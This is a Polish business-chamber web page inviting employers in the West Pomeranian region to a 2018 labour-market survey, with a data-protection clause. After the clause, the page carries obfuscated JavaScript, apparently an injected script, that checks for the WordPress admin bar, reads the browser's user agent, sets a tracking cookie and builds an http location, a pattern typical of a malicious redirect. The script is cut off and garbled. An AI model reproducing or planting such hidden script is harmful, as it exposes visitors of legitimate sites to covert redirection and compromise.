Ankieta – Nastroje zatrudnieniowe pracodawców w woj. zachodniopomorskim w IV kwartale 2018 r. | Północna Izba Gospodarcza w Koszalinie

Szanowni Państwo,

Wojewódzki Urząd Pracy w Szczecinie realizuje badanie pn. „Nastroje zatrudnieniowe pracodawców w woj. zachodniopomorskim w IV kwartale 2018 r.”

Celem niniejszego badania jest rozpoznanie planów zatrudnieniowych pracodawców z terenu województwa zachodniopomorskiego, w kontekście zatrudnienia oraz redukcji personelu w IV kwartale 2018 roku. Uzyskane od Państwa informacje będą traktowane jako poufne i prezentowane jedynie w postaci zbiorczych opracowań statystycznych.

Prosimy o udzielanie szczerych i prawdziwych odpowiedzi, ponieważ tylko takie mogą pomóc w realizacji celu badania.

Jeśli wyrażasz zgodę na wzięcie udziału w ankiecie kliknij tutaj->

Z poważaniem

Paweł Wojtaszyk

Zachodniopomorskie Obserwatorium Rynku Pracy

 

Wojewódzki Urząd Pracy

ul. A. Mickiewicza 41

70-383 Szczecin

tel. 91 42 56 120/179

e-mail: zorp@wup.pl

www.wup.pl

Klauzula informacyjna – Realizacja działań badawczo-analitycznych dot. rynku pracy – badania własne.

Administratorem danych osobowych jest Wojewódzki Urząd Pracy w Szczecinie. Z Inspektorem Danych Osobowych można skontaktować się poprzez email: iod@wup.pl lub listownie. Informacje dotyczące polityki ochrony danych znajdą Państwo tutaj. Informacje znajdują się również na stronie BIP. 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m